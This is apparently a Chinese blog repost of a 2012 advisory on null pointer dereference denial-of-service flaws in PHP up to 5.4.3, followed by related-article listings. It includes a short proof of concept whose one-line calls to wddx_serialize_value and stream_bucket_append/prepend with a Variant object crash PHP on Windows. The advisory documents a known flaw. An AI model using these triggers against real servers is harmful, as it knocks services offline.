PHP空指针,PHP多个空指针引用拒绝服务漏洞

最新推荐文章于 2021-03-26 10:37:55 发布
最新推荐文章于 2021-03-26 10:37:55 发布
阅读量171 收藏
点赞数
文章标签: PHP空指针

发布日期:2012-05-11

更新日期:2012-05-23

受影响系统:

PHP PHP 5.4.3

描述:

--------------------------------------------------------------------------------

BUGTRAQ  ID: 53643

PHP是一种HTML内嵌式的语言,PHP与微软的ASP颇有几分相似,都是一种在服务器端执行的嵌入HTML文档的脚本语言,语言的风格有类似于C语言,现在被很多的网站编程人员广泛的运用。

PHP 5.4.3之前版本在实现时存在空指针引用导致的多个拒绝服务漏洞,攻击者可利用这些漏洞造成应用崩溃。

*>

测试方法:

--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

/*

PHP <= 5.4.3 wddx_serialize_* / stream_bucket_* Variant Object Null Ptr Derefernce

Author : condis

Date : 10.04.2012 AD

Website : http://cond.psychodela.pl

----

Download : http://php.net/downloads.php

Tested on:

PHP 5.3.8  + Windows XP SP3 Professional PL

PHP 5.3.10 + Windows XP SP3 Professional PL

PHP 5.4.0  + Windows XP SP3 Professional PL

PHP 5.4.3  + Windows XP SP3 Professional PL

Description:

wddx_serialize_value and wddx_serialize_vars functions fails to handle Variant

object when it is given as a first argument.

Registers:

EAX 00000000

ECX 1056AAE8 php5ts.1056AAE8

EDX 100EFCE0 php5ts.100EFCE0

EBX 01032AB0

ESP 00C0FAE0

EBP 00000000

ESI 0121E478

EDI 0121CB50

EIP 1028F22E php5ts.1028F22E

Crash:

1028F22E   8A45 25          MOV AL,BYTE PTR SS:[EBP+25]

Situation looks pretty much the same for both wddx_serialize_vars and

wddx_serialize_value. Also functions stream_bucket_prepend and stream_bucket_append

have some problems with handling Variant object when given as a second argument:

stream_bucket_append(1, new Variant(1));

stream_bucket_prepend(1, new Variant(1));

PS : Variant object is only available in PHP for Windows OS and it was implemented

in PHP > 4.1.0 and PHP 5.

For more details check : http://php.net/manual/en/class.variant.php

PS2: After running this via webserver my Apache wasn't able to handle requests

anymore and I had to restart him :)

kthxbye

*/

wddx_serialize_value(new Variant(666));

?>

建议:

--------------------------------------------------------------------------------

厂商补丁:

PHP

---

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.php.net0b1331709591d260c1c78e86d0c51c18.png

Melo的健身课堂
关注
软件代码漏洞风险等级
oscar999的专栏
07-09 388
代码漏洞的风险等级通常根据漏洞的潜在影响、利用难易程度以及可能造成的损害程度来划分。不同的组织或机构可能会采用不同的标准或评分系统来评估漏洞的风险等级。
PHP常见面试题】 垃圾回收机制-写时复制和引用计数
不秃头的程鲜森的博客
09-16 591
写入拷贝(Copy-on-write,简称COW)是一种计算机程序设计领域的优化策略。其核心思想是,如果有多个调用者(callers)同时要求相同资源(如内存或磁盘上的数据存储),他们会共同获取相同的指针指向相同的资源,直到某个调用者试图修改资源的内容时,系统才会真正复制一份专用副本(private copy)给该调用者,而其他调用者所见到的最初的资源仍然保持不变。这过程对其他的调用者都是透明的(transparently)。此作法主要的优点是如果调用者没有修改该资源,就不会有副本(private copy
php 空指针_空指针Base on windows Writeup
weixin_35385462的博客
03-08 407
原标题:空指针Base on windows Writeup周末看了一下这次空指针的第三次Web公开赛,稍微研究了下发现这是一份最新版DZ3.4几乎默认配置的环境,我们需要在这样一份几乎真实环境下的DZ中完成Get shell。这一下子提起了我的兴趣,接下来我们就一起梳理下这个渗透过程。与默认环境的区别是,我们这次拥有两个额外的条件。1、Web环境的后端为Windows2、我们获得了一份confi...
php 空指针_PHP 5.4.3 多个空指针引用拒绝服务漏洞
weixin_34526733的博客
03-08 132
<?php/*PHP <= 5.4.3 wddx_serialize_* / stream_bucket_* Variant Object Null Ptr DerefernceAuthor : condisDate : 10.04.2012 ADWebsite : http://cond.psychodela.pl----Download : http://php.net/downl...
php 野指针,Object-C基础-06-空指针和野指针
weixin_35811662的博客
03-12 129
一、什么是空指针和野指针1.空指针1> 没有存储任何内存地址的指针就称为空指针(NULL指针)2> 空指针就是被赋值为0的指针,在没有被具体初始化之前,其值为0。下面两个都是空指针:1Student*s1=NULL;23Student*s2=nil;2.野指针"野指针"不是NULL指针,是指向"垃圾"内存(不可用内存)的指针。野指针是非常危险的。二、野指针和空指针例子接...
78 php&C "" 和NULL 指针
fancivez的专栏
08-18 440
1. " "分配了内存 ;null没有  调用null的字符串的方法会抛空指针异常。  ""是一个字符串(String).它在内存中是存在的.它可以使用Object对象中的方法(如"".toString();"".equals())  而null它是一个空对象.在内存中是不存在的.它不可以使用Object对象中的方法  ""占内存.. 在内存中会分配一个空间.  null不占内存. 为
php zend 多个站错误,PHP “zend_strndup()”多个空指针引用拒绝服务漏洞
weixin_34811747的博客
03-12 84
发布日期:2012-01-14更新日期:2012-01-17受影响系统:PHP PHP 5.3.8描述:--------------------------------------------------------------------------------BUGTRAQ ID: 51417CVE ID: CVE-2011-4153PHP是一种在电脑上运行的脚本语言,主要用途是在于处理动态...
php坑多,Php升级Php 7.4会遇到的两个大坑
weixin_36150766的博客
03-25 1823
Php升级Php 7.4会遇到的两个大坑发布时间:2020-04-29 09:48:38来源:亿速云阅读:219作者:小新今天小编给大家分享的是Php升级Php 7.4会遇到的两个大坑,相信很多人都不太了解,为了让大家更加了解Php 7.4,所以给大家总结了以下内容,一起往下看吧。一定会有所收获的哦。由于我机器用的滚动更新的Archlinux,不知不觉Php已经升级到7.4了,没想到这次更新带来了...
php_7.02_64位
02-22
在安全性方面,PHP 7.02修复了多个安全漏洞,这些漏洞可能在之前的版本中被恶意利用。例如,它改进了类型系统,减少了因类型不匹配导致的潜在错误,如空指针异常和未定义变量的使用。此外,PHP 7.02还增强了错误处理...
php8ectouch2(整站).rar
12-12
->`运算符使得在访问可能为null的对象属性或调用方法时,如果对象为空则不会抛出异常,而是返回null,减少了空指针异常的风险。 5. **Match表达式**:类似于其他语言的switch语句,但更安全且不易出错。 6. **错误...
空指针
huhailong_1的博客
05-14 1395
ssm框架 调用service出现空指针的问题1首先打个断点看看能不能进入到你的controller然后再进入你的service 断点看看你的service返回结果是不是为空2看看你的service是否注入成功3检查你的sql是不是就为空如果不想处理直接用异常包裹就行...
PHP空指针,PHP 5.3.7之前版本空指针引用拒绝服务漏洞
weixin_39607836的博客
03-26 94
127# ulimit -m 100000127# ulimit -v 100000127# cat /www/strtotime.php<?php$strx=str_repeat("A",$argv[1]);var_dump(strtotime($strx));?>127#127# /cxib/5371/build/bin/php /www/strtotime.php 333888...
PHP空指针,PHP “tidy_diagnose()”空指针引用拒绝服务漏洞
weixin_32050773的博客
03-26 73
发布日期:2012-02-14更新日期:2012-02-14受影响系统:PHP PHP 5.3.8描述:--------------------------------------------------------------------------------BUGTRAQ ID: 51992CVE ID: CVE-2012-0781PHP是一种在电脑上运行的脚本语言,主要用途是在于处理动态...
空指针异常处理
weixin_30700977的博客
12-15 194
转载于:https://www.cnblogs.com/lgaigai/p/4165755.html
PHP空指针,PHP ZipArchive::getArchiveComment()空指针应用拒绝服务漏洞
weixin_35802571的博客
03-26 197
漏洞起因设计错误危险等级低影响系统PHP PHP 5.3.2PHP PHP 5.3.1PHP PHP 5.3PHP PHP 5.2.13PHP PHP 5.2.12PHP PHP 5.2.11PHP PHP 5.2.10PHP PHP 5.2.9 -2PHP PHP 5.2.9PHP PHP 5.2.8PHP PHP 5.2.7PHP PHP 5.2.6PHP PHP 5.2.5PHP PHP 5...
php空指针调用成员函数报错,使用nullptr调用类的成员函数
weixin_36051940的博客
03-21 279
注:这里只是为了探寻C++的内部机制,实践中解引用空指针是绝不应该出现的如果希望只通过类名调用成员函数,请声明静态成员函数#include using namespace std;class MyClass {private:int k;public:MyClass(int _k);~MyClass();int add(int i, int j);int addWithThis(int i, in...
C语言中的空指针空指针常量、NULL & 0
技术资料库
02-14 2847
什么是空指针常量(null pointer constant)?[6.3.2.3-3] An integer constant expression with the value 0, or such an expression cast to type void *, is called a null pointer constant.这里告诉我们:0、0L、/0、3 - 3、0
解决空指针异常的一些经验
qq_38446250的博客
07-08 2470
Caused by: java.lang.NullPointerException at com.example.kongjian_10.MainActivity.writeThink(MainActivity.java:25) at java.lang.reflect.Method.invokeNative(Native Method) at java
php空指针调用成员函数报错,[C++]类的空指针调用成员函数后,会发生什么事?...
weixin_36111194的博客
03-21 115
类的实例调用成员函数的原理其实不管是通过对象实例或指针实例调用,其实底层调用的过程都是一样的,都是把当前对象的指针作为一个参数传递给被调用的成员函数。通过下面的相关实例代码进行检验:实验的C++代码class Student{private:int age;public:Student() {}Student(int age) : age(age) {}int getAge() { return ...
PHP数组操作深度解析:遍历、指针与函数
每个数组内部都有一个指针,初始时指向数组的第一个元素。遍历数组通常需要配合循环结构,如`for`或`while`,以及PHP提供的指针控制函数。例如,`current()`用于获取当前指针所指向的元素的值,`key()`用于获取键,`...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值